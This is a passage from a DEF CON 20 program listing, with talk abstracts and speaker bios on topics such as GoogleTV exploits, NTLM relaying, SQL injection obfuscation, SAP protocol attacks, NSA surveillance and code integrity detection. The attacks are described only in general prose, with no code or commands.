of the Open-Source community and is core developer of Paparazzi UAV, libopencm3 cortex-m3 open
source firmware library, open-bldc open source brushless motor controller, he is also
involved with many other Open-Source projects and submitting patches here
and there. ;)
Twitter: @esden
Facebook: esdentem
http://www.esden.net
dotAero obtained an S.B. in Aerospace Engineering from MIT in
2009 and an M.S.E. (Aerospace Engineering) from the University of Michigan, Ann Arbor in 2010 and
worked on diverse projects ranging from designs for electrically-propelled spacecraft to stall and
surge resistant compressors, and underwater ROVs during his university career.From 2010-2011, he
served as the Lead Engineer for Aerodynamics at Joby Energy, Inc. He enjoys working on innovative
aerodynamic design concepts for UAVs, which led him to co-found Transition Robotics, Inc. in 2011,
where he serves as the Aerodynamics and Controls Engineer. He is designing dedicated airframes
for Paparazzi vehicles since 2010.
misterj received a Bachelor's degree in Computer Science from
Pomona College in 2002 and worked at Apple Computer, Inc. until 2007. In 2008 he began work at Joby Energy,
Inc. and in 2010, he received his M.S.M.E. from San Jose State University with emphases on Mechatronics and
Design. In 2011, he co-founded Transition Robotics, Inc. where he serves as the Mechanical Engineer. He is
doing mechanical design for Paparazzi dedicated airframes since 2008. He also designs self balancing
one wheel skateboards.
cifo grew up with model aviation and took Aeronautical
Engineering at Embry-Riddle Aeronautical University. In 2011 he co-founded Transition Robotics, Inc.
where he heads up prototyping and flight testing. He is integrating and flying Paparazzi based UAV since 2011.
Hacking the Google TV
Amir "Zenofex" Etemadieh
CJ Heres
Dan Rosenberg
Tom "tdweng" Dwenger
CJ Heres
Dan Rosenberg
Tom "tdweng" Dwenger
The GoogleTV platform is designed to bring an integrated web experience,
utilizing the Chrome web browser and Android applications, to your television. GoogleTV is
based on the Android operating system, which is mainly used in tablets and smart phones,
but customized with security features not normally seen on most Android devices. The current
version of the platform utilizes signatures to establish a “chain of trust” from bootloader
to system applications.
This presentation will focus on the current GoogleTV devices, including X86 platform details, and
the exhaustive security measures used by each device. The presentation will also include video
demonstrations of previously found bugs and exploits for each GoogleTV device and includes
specific details about how each bug works. Furthermore, we will include interesting experiences
that the team has encountered along the way. Finally the talk will be capped off with the release
of multiple unpublished GoogleTV exploits which will allow unsigned kernels across
all x86 devices (Revue / Sony GoogleTV).
Amir "Zenofex" Etemadieh founded the GTVHacker group
and has been working on the GTVHacker project from its initial start in November 2010. Amir has
done independent security research in consumer electronics including the Logitech Revue,
Ooma Telo, Samsung Galaxy S2, Boxee Box and services such as the 4G Clear Network
finding both hardware and software flaws.
Twitter: @zenofex
http://blog.gtvhacker.com
http://www.gtvhacker.com
CJ Heres is an IT consultant during the day,
tinkerer at night. He enjoys examining and repairing all sorts of devices from cars to
blu-ray players. His philosophy is to use a simple approach for complex problems. CJ’s
recent work includes Sony GoogleTV, Boxee Box, and Vizio Smart TV’s.
Twitter: @cj_000_
Dan Rosenberg Dan Rosenberg is a vulnerability
researcher who takes sick pleasure in exploiting anything with a CPU. He once punched
an Android in the face.
Twitter: @djrbliss
Tom "tdweng" Dwenger is a software engineer
who has been developing and reversing Android for the last 2 years. Tom is known for
being able to quickly reverse Android applications and has been an active member of
the GTVHacker team since its initial start in 2010.
Twitter: @tdweng
Owned in 60 Seconds: From Network Guest to Windows Domain Admin
Zack Fasel
Their systems were fully patched, their security team watching, and the amateur
pentesters just delivered their “compliant” report. They thought their Windows domain was secure.
They thought wrong.
Zack Fasel (played by none other than Angelina Jolie) brings a New Tool along with New methods to
obtain Windows Integrated Authentication network requests and perform NTLM relaying both internally
and externally. The Goal? Start off as a nobody and get domain admin (or sensitive data/access) in 60
seconds or less on a fully patched and typically secured windows environment. The Grand Finale? Zack
demonstrates the ability to *externally* gain access to a Windows domain user's exchange account
simply by sending them an email along with tips on how to prevent yourself from these attacks.
In just one click of a link, one view of an email, or one wrong web request, this new toolset steals
the identity of targeted users and leverages their access. Call your domain admins, hide your road
warriors, and warn your internal users. Zack will change the way you think about Windows Active
Directory Security and trust relationships driving you to further harden your systems and help you sleep at night.
Owned in 60 Seconds. Coming This Summer.
Zack Fasel is a seasoned Penetration Tester and Security
Consultant with diverse experience serving clients ranging in Fortune 1000s, Enterprises, and SMBs
in varying industries. He has delivered hundreds of network, wireless, and social penetration tests
and subsequently driven strong defensive remediation strategies as a result. Zack tries to stay
closely connected to the local security community in Chicago as the lead for dc312[.org] and as
a Co-Founder of THOTCON[.org], Chicago’s local Hacking con. When not focusing his efforts on
Infosec, Zack can be found playing the untz untz wubs, taking photos, fending off the ladies,
or trying to find the nearest Chipotle. Stalkers can stalk him over at zfasel.com or @zfasel on the twitters.
Twitter: @zfasel
zfasel.com
Hellaphone: Replacing the Java in Android
John Floren Senior Member of Technical Staff, Sandia National Labs
Android is the only widespread open-source phone environment available today, but actually hacking
on it can be an exercise in frustration, with over 14 million lines of code (not counting the Linux kernel!), build times
in the hours, and the choice of writing Java or C++/JNI. Add in security debacles like the CarrierIQ affair or the alleged
man-in-the-middle attacks at the last DEF CON and Android starts to seem less attractive.
We wanted a phone that's easy to hack on, with a quick development turnaround time. By killing off the Java layer of
Android and only loading the underlying Linux system, we found a useful, relatively light-weight platform for further
development. We then adapted the Inferno operating system to run on our phones, eventually getting a graphical phone
environment in under 1 million lines of code, including a phone application, an SMS app, several text editors, a shell,
a compiler, a web browser, a mail client, and even some games. The actual core of the Inferno OS is small and simple
enough for one person to read, understand, audit, and hack on; applications are similarly simple and easy to write.
This talk discusses in greater depth our motivations and the methods we used to adapt Android phones to new and excitingly broken
purposes. If the Demo Gods are kind, there will also be a demonstration of the Inferno phone environment.
*Sandia National Laboratories is a multi-program laboratory managed and operated by Sandia Corporation, a wholly owned subsidiary
of Lockheed Martin Corporation, for the U.S. Department of Energy's National Nuclear Security Administration under contract
DE-AC04-94AL85000. SAND-2012-3785 A
John Floren is a Senior Member of Technical Staff at Sandia National
Laboratories, where he works in High Performance Computing and security research. He occasionally puts odd operating
systems on inappropriate systems, so far having helped port Plan 9 to the IBM Blue Gene series and Inferno to cell phones.
Hacking [Redacted] Routers
FX Leader, Phenoelit Group, Recurity Labs
Greg Recurity Labs
Greg Recurity Labs
[Redacted] routers are no longer devices only seen in [Redacted]. Entire countries run their
Internet infrastructure exclusively on these products and established tier 1 ISPs make increasing use of
them. However, very little is known of [Redacted]'s Software Platform and its security. This
presentation will introduce the architecture, special properties of configurations and services as well
as how to reverse engineer the OS. Obviously, this is done only to ensure compatibility with router products of other vendors ;)
Routers might be still hurt in the process.
FX is the leader of the Phenoelit group and loves to hack
pretty much everything with a CPU and some communication, preferably networked. He looks back at
around fifteen years of (legal) hacking with only a couple Cisco IOS and SAP remote exploits, tools
for hacking HP printers and protocol attacks lining the road.
In his day life, FX runs Recurity Labs GmbH, a security consulting and research company in
Berlin, Germany.
Twitter: @41414141
Greg joined the Recurity Labs team early 2008. Prior to
Recurity Labs, Greg worked as a freelancer for a number of large customers. Greg is experienced in
source code audits, black box analysis and reverse engineering. Furthermore, Greg also performs
software/system design work at Recurity Labs. Greg works on various internal research projects,
where he applies his taste for cryptography.
Demorpheus: Getting Rid Of Polymorphic Shellcodes In Your Network
Svetlana Gaivoronski PhD Student, Moscow State University
Dennis Gamayunov Senior Researcher, Moscow State University
Dennis Gamayunov Senior Researcher, Moscow State University
One of the most effective techniques used in CTF is the usage of various exploits,
written with the help of well-known tools or even manually during the game. Experience in CTF participation
shows that the mechanism for detecting such exploits is able to significantly increase the defense level of
the team.
In this presentation we propose an approach and hybrid shellcode detection method, aimed at early detection and
filtering of unknown 0-day exploits at the network level. The proposed approach allows us to summarize capabilities
of shellcode detection algorithms developed over recent ten years into optimal classifiers. The proposed approach
allows us to reduce the total fp rate almost to 0, provides full coverage of shellcode classes detected by individual
classifiers and significantly increases total throughput of detectors. Evaluation with shellcode datasets,
including Metasploit Framework 4.3 plain-text, encrypted and obfuscated shellcodes, benign Win32 and Linux ELF
executables, random data and multimedia shows that hybrid data-flow classifier significantly boosts analysis
throughput for benign data - up to 45 times faster than linear combination of classifiers, and almost 1.5
times faster for shellcode only datasets.
Svetlana Gaivoronski is a PhD student at Computer Systems Lab,
Computer Science Dept. of Moscow State University, Russia. Svetlana is a member of the Bushwhackers CTF
team which shows the following results in recent years: 2nd place in Deutsche Post Security Cup 2010,
6th place in the final of ruCTF 2012 (8th at qualification), 12th place at ruCTF Europe 2011,
4th place in the final of ruCTF
2011 (and 1st at qualification), etc. Svetlana works at Redsecure project (experimental IDS/IPS)
at Moscow State University. Her primary interests are network worms propagation detection and filtering,
shellcode detection, static and runtime analysis of malware.
Twitter:@SadieSV
lvk.cs.msu.su/~sadie
Dennis Gamayunov holds a PhD and works as Senior Researcher at Computer Systems Lab,
Computer Science Dept. of Moscow State University, Russia. Dennis is the leader of the small network
security research group in MSU, project lead of the experimental event-driven and natively multicore
Redsecure IDS/IPS, founder of Bushwhackers CTF team, with primary research and practical interests in
network level malcode detection, high-speed traffic processing (including FPGA-based), and OS
security with fine-grained privilege separation, SELinux and beyond.
Twitter: @jamadharma
http://redsecure.ru/team/denis-gamayunov
New Techniques in SQLi Obfuscation: SQL never before used in SQLi
Nick Galbreath
SQLi remains a popular sport in the security arms-race. However,
after analysis of hundreds of thousands of real world SQLi attacks, output from SQLi scanners,
published reports, analysis of WAF source code, and database vendor documentation, both SQLi
attackers and defenders have missed a few opportunities. This talk will iterate through the
dark corners of SQL for use in new obfuscated attacks, and show why they are problematic for
regular-expression based WAFs. This will point the way for new directions in SQLi research
for both offense and defense.
Nick Galbreath is a director of
engineering at Etsy, overseeing groups handling fraud, security, authentication and internal
tools. Over the last 18 years, Nick has held leadership positions in number of social and
e-commerce companies, including Right Media, UPromise, Friendster, and Open Market, and has
consulted for many more. He is the author of "Cryptography for Internet and Database
Applications" (Wiley), and was awarded a number of patents in the area of social networking.
He holds a master's degree in mathematics from Boston University.
Twitter: @ngalbreath
http://client9.com
https://github.com/client9
Uncovering SAP Vulnerabilities: Reversing and Breaking the Diag Protocol
Martin Gallo Security Consultant, Core Security
Nowadays, SAP Netweaver has become the most extensive platform for building enterprise applications and run
critical business processes. In recent years it has become a hot topic in information security. However, while fixes and
countermeasures are released monthly by SAP at an incredible rate, the available security knowledge is limited and some
components are still not well covered.
SAP Diag is the application-level protocol used for communications between SAP GUI and SAP Netweaver Application Servers and it's
a core part of any ABAP-based SAP Netweaver installation. Therefore, if an attacker is able to compromise this component, this would
result in a total takeover of a SAP system. In recent years, the Diag protocol has received some attention from the security
community and several tools were released focused on decompression and sniffing. Nevertheless, protocol specification is not
public and internal components and inner-workings remains unknown; the protocol was not understood and there is no publicly
available tool for active exploitation of real attack vectors.
This talk is about taking SAP penetration testing out of the shadows and shedding some light into SAP Diag, by introducing a
novel way to uncover vulnerabilities in SAP software through a set of tools that allows analysis and manipulation of the SAP
Diag protocol. In addition, we will show how these tools and the knowledge acquired while researching the protocol can be used
for vulnerability research, fuzzing and practical exploitation of novel attack vectors involving both SAP's client and server
applications: man-in-the-middle attacks, RFC calls injection, rogue SAP servers deployment, SAP GUI client-side attacks and more.
As a final note, this presentation will also show how to harden your SAP installations and mitigate these threats.
Martin Gallo is a Security Consultant at CORE Security, where he performs
application and network penetration testing, conducts code reviews and identifies vulnerabilities
in enterprise and third party software. His research interests include enterprise software security,
vulnerability research and reverse engineering.
Post-Exploitation Nirvana: Launching OpenDLP Agents over Meterpreter Sessions
Andrew Gavin Security Consultant, Verizon Business
Michael Baucom Vice President of R&D, N2 Net Security Inc.
Charles Smith Software Developer, N2 Net Security Inc.
OpenDLP is a free and open source agent-based data discovery tool that works against Microsoft Windows
systems using appropriate authentication credentials. However, one drawback to OpenDLP is that its policy-driven approach
makes it arduous to scan disjointed systems that are not part of a Windows domain or do not share the same authentication
credentials. To fix this, OpenDLP can now launch its agents over Meterpreter sessions using Metasploit RPC without
requiring domain credentials.
Andrew Gavin, creator of OpenDLP, is an information security consultant at
Verizon Business. He has more than 12 years of experience in security assessments of networks and applications. He has
consulted for numerous customers in various industries around the world.
Twitter: @OpenDLP (project), @andrewgavin (personal)
Michael Baucom is the VP of Engineering at N2 Net Security. Michael has taught
classes on exploit development and was the technical editor for Gray Hat Hacking: the Ethical Hacker's Handbook. He has worked
in development for over 15 years in various industries. While at N2 Net Security he has worked on a wide variety of projects
including software security assessments, tool development, and penetration tests.
Charles Smith is a graduate of North Carolina State University, and has been
building credit card software and developer tools and modules for the last ten years. Recently he has joined N2 Net
Security, and has put his skills to ferreting out security vulnerabilities and building new tools to help penetration
testers do their jobs more efficiently. He specializes in C++, but is also well-versed in Java, .NET, VB, and Perl.
The Art of Cyberwar
Kenneth Geers NCIS Cyber Subject Matter Expert
The establishment of US Cyber Command in 2010 confirmed that
cyberspace is a new domain of warfare. Computers are now both a weapon
and a target. Future wars may even be fought over the ownership of IT
infrastructure. Therefore, national security thinkers must find a way
to incorporate cyber attack and defense into military doctrine as soon
as possible. The world’s most influential military treatise is Sun
Tzu’s Art of War. Its wisdom has survived myriad revolutions in
technology and human conflict, and future cyber commanders will find
Sun Tzu’s guidance beneficial. However, this presentation will also
consider 10 revolutionary aspects of cyber war that will be difficult
to fit into military doctrine.
Kenneth Geers (PhD, CISSP) is the U.S. Naval Criminal Investigative
Service (NCIS) Cyber Subject Matter Expert. Mr. Geers has been a
student in six countries, served as an intelligence analyst, a French
and Russian linguist, and a computer programmer in support of arms
control initiatives. He was the first U.S. Representative to the
Cooperative Cyber Defence Centre of Excellence in Tallinn, Estonia.
Kenneth is widely published on the relationship between information
technology and national security, and is the author of Strategic Cyber
Security, now a free download: http://ccdcoe.org/278.html.
Twitter: @kennethgeers
http://www.chiefofstation.com
More Projects of Prototype This!
Joe Grand Electrical Engineer, Grand Idea Studio
Zoz Robotics Engineer
For 18 months, Joe Grand and Zoz Brooks were co-hosts of Discovery Channel's
Prototype This, an engineering entertainment program that followed the real-life design process of
a unique prototype every episode.
At DEF CON 17, Joe and Zoz talked about the show and a few of their favorite builds. The dynamic
nerd duo returns to DEF CON 20 with design details and never-before-seen pictures and videos of
even more ridiculous and crazy projects, including the Mind Controlled Car, Boxing Robots,
Six-Legged All Terrain Vehicle, Get Up and Go, and Automated Pizza Delivery, each of
which had to be designed and built in a matter of weeks.
Joe Grand is an electrical engineer a
nd hardware hacker specializing in the design of consumer and hobbyist embedded
systems. He created the electronic badges for DEF CON 14-18 and was a co-host of
Discovery Channel's Prototype This. Back in the day, he was a member of the
infamous hacker group L0pht Heavy Industries.
Twitter: @joegrand
http://www.grandideastudio.com/
Zoz is a robotics engineer, pyrochemist,
and inveterate tinkerer. He got his PhD from the Robotic Life group at the MIT Media
Lab primarily so he could say "Trust me, I'm a doctor" to other robots. One of his
biggest goals is to restore science and engineering education to pride of place as
a top global priority, so when he discovered that this aim could be combined with
his love of media whoring he co-hosted Prototype This! for the Discovery Channel.
Hacking Measured Boot and UEFI
Dan Griffin President, JW Secure, Inc.
There's been a lot buzz about UEFI Secure Booting, and the ability of hardware and software
manufacturers to lock out third-party loaders (and rootkits). Even the NSA has been advocating the adoption
of measured boot and hardware-based integrity checks. But what does this trend mean to the open source and
hacker communities? In this talk I'll demonstrate measured boot in action. I'll also be releasing my new
Measured Boot Tool which allows you to view Trusted Platform Module (TPM) boot data and identify risks
such as unsigned early-boot drivers. And, I'll demonstrate how measured boot is used for remote
device authentication.
Finally, I'll discuss weaknesses in the system (hint: bootstrapping trust is still hard),
what this technology means to the consumerization trend in IT, and what software and
services gaps exist in this space for aspiring entrepreneurs.
Dan Griffin is the founder of JW Secure, a
Seattle-based security software company. He has published several articles on security
software development, as well as on IT security, and is a frequent conference speaker.
Dan holds a Masters degree in Computer Science from the University of Washington and a
Bachelors degree in Computer Science from Indiana University. Dan previously gained
notoriety for demonstrating how to use a hacked smart card to compromise
Windows Vista.
Twitter: @jwsdan
Exchanging Demands
Peter Hannay Security Researcher, PhD Student
Smart phones and other portable devices are increasingly used
with Microsoft Exchange to allow people to check their corporate emails or sync
their calendars remotely. Exchange has an interesting relationship with its
mobile clients. It demands a certain level of control over the devices,
enforcing policy such as password complexity, screen timeouts, remote lock
out and remote wipe functionality. This behavior is usually accepted by the
user via a prompt when they first connect to Exchange. However, the protocol
for updating these policies provides very little in the way of security and
is quickly accepted by the device, often with no user interaction required.
In this talk we will focus on the remote wipe functionality and how a potential
attacker could abuse this functionality to remotely wipe devices that are connected
to Exchange. By impersonating an Exchange server and sending appropriate policy
updates through a simple script we are able to erase all data on devices remotely
without any need for authentication. The presentation will explain how this can
be accomplished and show proof of concept code for Android & iOS devices.
Peter Hannay is a PhD student, researcher
and lecturer based at Edith Cowan University in Perth Western Australia. His PhD
research is focused on the acquisition and analysis of data from small and
embedded devices. In addition to this he is involved in smart grid &
network security research and other projects under the banner of the SECAU research organisation.
Peter is an accomplished academic, with more than 20 publications in peer reviewed
conferences and journals, in addition he is a regular speaker at the Ruxcon and Kiwicon
hacker conferences taking place in Australia and New Zealand respectively.
Twitter:@kronicd
http://openduck.com
Changing the Security Paradigm: Taking Back Your Network and Bringing Pain to the Adversary
Shawn Henry CrowdStrike
The threat to our networks is increasing at an unprecedented rate.
The hostile environment we operate in has rendered traditional security strategies obsolete.
Adversary advances require changes in the way we operate, and "offense" changes the game.
Shawn Henry Prior to joining CrowdStrike, Henry
was with the FBI for 24 years, most recently as Executive Assistant Director, where he
was responsible for all FBI criminal investigations, cyber investigations, and international operations worldwide.
Busting the BARR: Tracking “Untrackable” Private Aircraft for Fun & Profit
Dustin Hoffman President & Senior Engineer, Exigent Systems Inc.
Semon Rezchikov Independent Researcher
Semon Rezchikov Independent Researcher
Private aircraft provide transportation to interesting people: corporate officers,
business owners, celebrities, high net-worth individuals, etc.
In recent years, sites like FlightAware have made it trivial to access all public flight plans. However, aircraft
owners can opt into a block list (the BARR) that prevents their flight information from being made public. All the
interesting people are on the BARR.
We’ll explain the basics of how the the ATC system and sites like FlightAware work, demonstrate
a serious, unpatchable method for tracking otherwise “untrackable”, BARRed aircraft,
and demo our site that lets you do the same.
Dustin Hoffman is the president and senior engineer
of Exigent Systems Inc., an IT services firm based in Southern California. He’s interested in
how all kinds of complex systems work and interact, whether technical, organizational, legal,
or economic. He’s held a Private Pilot’s certificate (PPSEL) since 2008.
Semon Rezchikov is an independent security researcher
and synthetic biologist. He masterminded last year’s presentation on the FAST Airport Security
System and is a 20 Under 20 Fellow. Over the summer, he’s building flexible bioautomation robots
and simulating synthetic morphogenetic multicellular patterning for MIT’s Weiss Lab for Synthetic
Biology. In his free time, he can be found playing around with mathematics, reading too many papers,
and thinking of ways to mess with the systems around him.
Crypto and the Cops: the Law of Key Disclosure and Forced Decryption
Marcia Hofmann Senior Staff Attorney, Electronic Frontier Foundation
Can the government force you to turn over your encryption passphrase or
decrypt your data? The law surrounding police attempts to force decryption is developing at
breakneck speed, with two major court decisions this year alone. This talk will start off
with an in-depth explanation of the Fifth Amendment privilege against self-incrimination,
its origins, and how it applies to government attempts to force disclosure of keys or
decrypted versions of data in the United States. We'll also discuss law enforcement
authority to demand passphrases and decryption of data stored with third parties,
and survey key disclosure laws in other countries.
Marcia Hofmann is a senior staff attorney at
the Electronic Frontier Foundation, where she works on a broad range of digital civil
liberties issues including computer security, electronic privacy, and free expression.
She currently focuses on computer crime and EFF's Coders' Rights Project, which promotes
innovation and protects the rights of curious tinkerers and researchers in their
cutting-edge exploration of technology. Prior to joining EFF, Marcia was staff
counsel and director of the Open Government Project at the Electronic
Privacy Information Center (EPIC).
Passive Bluetooth Monitoring in Scapy
Ryan Holeman
Recognizing a need to support passive bluetooth monitoring in Scapy,
Python's interactive monitoring framework, a project was launched to
produce this functionality. Through this functionality, a new means
for interactively observing bluetooth was created along with Python
APIs to assist in the development of bluetooth auditing, pentesting
and exploitation tools.
The project supplements the work of Michael Ossman et al by providing
Python extensions and Scapy modules which interact with an Ubertooth
dongle. The project also provides support for other passive bluetooth
techniques not present in the current Ubertooth core software such as
NAP identification, vendor lookup, extended logging and more.
In conjunction with this presentation, the source for this project
will be released along with distribution packages for easy
installation.
Ryan Holeman resides in Austin Texas where he works as a software
developer specializing in backend services. He has a Masters of
Science in Software Engineering and has published papers though ICSM
and ICPC. His spare time is mostly spent digging into various network
protocols and shredding local skateparks.
How to Hack All the Transport Networks of a Country
Alberto García Illera
The presentation is about a real black hacking act against the transport
network of a country. It can be extrapolated to any other country. We will show how to get full access
to the entire transport network. Manipulating parameters to get
free tickets, getting control of the ticket machines, getting clients CC dumps, hooking
internal processes to get the client info, pivoting between machines, encapsulating all the
traffic to bypass the firewalls, etcetera.
We will show a lot of photos, videos, source code and presentations of the real environment
and the skills used to obtain all the information. We will show how combining social
engineering and technical skills can be used as a deadly weapon.
Alberto García Illera is a 24 year old passionate about
hacking and especially for social engineering. He studied mathematics and computer systems
in Spain. He has worked several years as a professional pentester. He has spoken
in several seminars teaching hacking techniques to help big companies like Microsoft,
the Spanish government or the Spanish Police's Cyberterrorism department. He is currently making a
study about cryptographic hash functions applied to IT security.
Bigger Monster, Weaker Chains: The National Security Agency and the Constitution
Jameel Jaffer Deputy Legal Director, American Civil Liberties Union
William Binney Former Official, National Security Agency
James Bamford Investigative Journalist
Alex Abdo Staff Attorney, American Civil Liberties Union
William Binney Former Official, National Security Agency
James Bamford Investigative Journalist
Alex Abdo Staff Attorney, American Civil Liberties Union
The National Security Agency, the largest, most powerful spy agency in the world,
has taken in an estimated 15 to 20 trillion communications since 9/11, often in defiance of the Constitution
and Congressional statutes. The NSA’s goal, some say, is to collect virtually all of our electronic
communications to allow mass data mining reminiscent of the notorious and now reportedly-defunct program,
Total Information Awareness. The limits on the agency’s authority to sweep up and analyze this information
are critical to our safety and our privacy. The NSA is investing vast amounts in increasing its data
storage, code-breaking and analysis capabilities, frequently claiming the investments are for foreign
intelligence or “cybersecurity” purposes. However, instead of keeping its equipment trained on terrorism
suspects or foreign governments, the NSA is increasingly monitoring the communications of innocent people.
Longtime NSA official and whistleblower Bill Binney will join investigative journalist and NSA expert James
Bamford and ACLU lawyer Alex Abdo to explore the NSA’s goals, reach, and capabilities, and the
legality (or illegality) of its actions.
The panel will be moderated by the Deputy Director of the ACLU, Jameel Jaffer.
Jameel Jaffer is Deputy Legal Director at the ACLU and
Director of the ACLU’s Center for Democracy, which houses the ACLU’s work on national security; human
rights; and speech, privacy, and technology. He has litigated many cases involving government
surveillance, including Doe v. Ashcroft, the case that resulted in the invalidation of the Patriot
Act’s “national security letter” provisions. Among the cases he is currently litigating are Clapper
v. Amnesty, a challenge to warrantless wiretapping under the FISA Amendments Act, a case that the U.S.
Supreme Court will hear this fall; ACLU v. CIA, a suit under the Freedom of Information Act for
records about the “targeted killing” program; and ACLU v. Department of Defense, a FOIA lawsuit
seeking records relating to the Bush administration’s torture program. The last of these cases
has resulted in the disclosure of thousands of government records, including the “torture memos”
written by lawyers in the Bush administration’s Office of Legal Counsel.
Twitter: @JameelJaffer
Facebook: jameel.jaffer
William Binney served in the National Security Agency for almost
four decades, most recently as Technical Director of the World Geopolitical and Military Analysis Reporting
Group and of the Analytic Services Office. Mr. Binney previously worked as the NSA’s Technical Director and
leading analyst for warning for Russia. Before that, he served for four years in the Army Security Agency.
Mr. Binney resigned from the NSA in 2001 to protest illegal monitoring of Americans’ communications. Since
then, he has worked for various government agencies on data management and advanced predictive analysis.
James Bamford is a bestselling author and one of the country’s leading
writers on intelligence and national security issues. His books include “The Puzzle Palace,” “Body of
Secrets,” “A Pretext for War: 9/11, Iraq and the Abuse of America’s Intelligence Agencies,” and most
recently “The Shadow Factory”. Mr. Bamford has also written extensively for magazines, including the
New York Times Magazine, the Atlantic, Harpers, and many other publications. In 2006, he won the National
Magazine Award for Reporting for his piece "The Man Who Sold The War," published in Rolling Stone. In
addition, he writes and produces documentaries for PBS and spent a decade as the Washington investigative
producer for the ABC News program, World News Tonight with Peter Jennings. He also taught at the University
of California, Berkeley, as a distinguished visiting professor.
Twitter: @WashAuthor
Alex Abdo is a Staff Attorney in the ACLU's National Security Project.
He has been involved in the litigation of cases concerning the FISA Amendments Act, the Patriot Act, the International
Emergency Economic Powers Act, and the treatment of detainees in Guantánamo Bay, Afghanistan, Iraq, and the Navy brig
in South Carolina. Among the cases he is currently litigating are: a challenge to warrantless wiretapping under the
FISA Amendments Act, and Freedom of Information Act suits for records relating to the use of Section 215 of the
Patriot Act, the use of “national security letters,” and the Bush administration’s warrantless-wiretapping program.
Twitter: @AlexanderAbdo
Black Ops
Dan Kaminsky Chief Scientist, DKH
If there's one thing we know, it's that we're doing it wrong. Sacred cows make the best hamburgers, so in this year's talk I'm going to play with some techniques that are obviously wrong and evil and naive. There will also be a lot of very interesting code, spanning the range from high speed network stacks to random number engines to a much deeper analysis of non-neutral networks. Finally, we will revisit DNSSEC, both in code, and in what it can mean to change the battleground in your favor.
Dan Kaminsky: I play with toys
http://dankaminsky.com
Twitter: @dakami
Owning One to Rule Them All
Dave Kennedy Chief Security Officer
Dave DeSimone Manager, Information Security
As penetration testers, we often try to impact an organization as efficient and effective as
we can to simulate an attack on an organization. What if you could own one system to own them all? That's it, one
system. It's all you need, it's in every company, and as soon as you compromise it, the rest fall (no not a domain
controller). This presentation will cover a recent penetration test where I came up with a unique avenue to getting
over 13,000 shells in just a few minutes by popping one server. I'll be releasing some custom tools to make this
simplistic and automate the majority of what was used on this attack. Let's pop a box.
Dave Kennedy will be signing copies of his book, Metasploit: The
Penetration Tester's Guide, at 14:00 on Friday at the No Starch Press
table in the Vendor area.
Dave Kennedy is the Chief Security Officer (CSO) for a Fortune 1000 company.
Kennedy is the author of the book Metasploit: The Penetration Testers Guide, the creator of the Social-Engineer
Toolkit (SET), and the creator of Fast-Track. Kennedy has presented on a number of occasions at Black Hat, DEF
CON, ShmooCon, BSIDES, Infosec World, Notacon, AIDE, Hashdays, Infosec Summit, and a number of other conferences.
Kennedy is on the Back|Track and Exploit-DB development team and co-host of the Social-Engineer.org and ISDPodcast
podcast. Kennedy is one of the co-authors of the Penetration Testing Execution Standard (PTES); a framework
designed to fix the penetration testing industry. Kennedy is a co-founder of DerbyCon, a large-scale security
conference in Louisville Kentucky. Kennedy <3's Python.
Twitter: @dave_rel1k
http://www.secmaniac.com/
Dave DeSimone is the Manager of Information Security for a Fortune 1000 company. DeSimone has developed, implemented, and operationalized the global vulnerability management program for multiple distinct international organizations. DeSimone's expertise is in penetration testing, security event response, network security, vulnerability/malware analysis and security architecture. DeSimone has also developed major programs including risk management, penetration testing, and application security.
Twitter: @d2theave
Detecting Reflective Injection
Andrew King Contract Researcher, GrayHat Research, LLC
This talk will focus on detecting reflective injection with some mildly humorous notes and bypassing said protections until vendors start actually working on this problem. It seems amazing that reflective injection still works. Why is that? Because programmers are lazy. They don't want to write new engines, they want to write definitions for an engine that already exists. So what do we do about it? Release a $5 tool that does what $50 AV has failed epically at for several years now...oh and it took me a week or so...Alternately, you could license it to vendors since their programmers are lazy.
Andrew King is a recent graduate. He has been a hobbyist for many years, but has only recently tried to transition into information security as a job field. A previous talk was given at ToorCon on polymorphism as it relates to definitions. He wrote a set of articles demonstrating implementation of simple internal to function encoding and decoding. Additional code will be released to demonstrate automation of binary patching to use this method without using a debugger. It is not a fully functional evasion tool, but it does demonstrate pushing this level of obfuscation into a more automated arena. Adding a couple of small code sections could turn this in to a usable evasion tool.
Twitter: @aking1012
An Inside Look Into Defense Industrial Base (DIB) Technical Security Controls: How Private Industry Protects Our Country's Secrets
James Kirk Senior Security Consultant / Rapid7, Inc.
With an ever changing threat of nation states targeting the United States and its infrastructure and insiders
stealing information for public release, we must continuously evaluate the procedural and technical controls we place on our
national assets. This presentation goes into brief detail on how security controls are developed, reviewed, and enforced at a
national level for protection of data classified up to Top Secret and some of the major flaws in the security approach to
data privacy.
The purpose of this presentation is to raise awareness of substandard security practices within sensitive areas of the Federal
Government and to influence change in how controls and practices are developed and maintained.
James Kirk is a Senior Security Consultant for Rapid7, Inc. who has over 11
years of experience in various information security disciplines. James, in his previous role, has served as a Special
Agent for the Department of Defense (Defense Security Service) where he conducted numerous security audits of defense
contractor facilities across the United States.
http://kirkjamesm.wordpress dot com
No More Hooks: Detection of Code Integrity Attacks
Xeno Kovah The MITRE Corporation
Corey Kallenberg The MITRE Corporation
Corey Kallenberg The MITRE Corporation
Hooking is the act of redirecting program control flow somewhere other than
it would go by default. For instance code can be "inlined hooked" by rewriting instructions to
unconditionally transfer to other code. Or code can be hooked by manipulating control flow data
like function pointers (IAT, IDT, SSDT, return addresses on the stack, callback addresses in
dynamically allocated objects, etc). Hooking as a technique is neutral, but it is often used
by malicious software to monitor or hide information on a system.
Memory integrity verification requires the ability to detect unexpected hooks which could be causing
software to lie or be blinded to the true state of the system. But we don't want to make the same
mistake that most security software makes, assuming that they can rely on some built in
access control to keep malice at arms length. The history of exploits is the history of
bypassing access control. We want to have a technique which can detect if we ourselves are
being manipulated to lie even when the attacker is assumed to be at the same
high privilege level as our software.
We believe that such a goal can be achieved with the help of an academic technique known as
software-based, or timing-based, remote attestation. This is a technique which does not
require a hardware root of trust like a TPM in order to bootstrap an ephemeral dynamic
root of trust for measurement. It does this by computing a randomized checksum over its
own memory and other system state, to detect code or control flow integrity attacks.
The self-checking software can still be forced to lie and report an unmodified system,
but thanks to a special looping construction, code which causes it to lie will require
extra instructions per loop. The extra instructions will be multiplied by the number of
loops, causing a macroscopic, remotely-detectable, increase in the runtime vs. what's
expected. So basically, an attacker can force our software to lie, but because there's
a timing side-channel built into the computation, he can still be caught by taking too
long to generate a convincing lie. We have independently implemented and confirmed the
claims of past work, and furthermore showed that the timing discrepancy in the presence
of a checksum-forging attacker is detectable not just for machines on the same ethernet
segment, but over 10 links of our production LAN. Because of the results of other work
in timing side-channel detection over internet-scale distances, we think this technique
can be extended even further. But for now for longer distances, we use this same
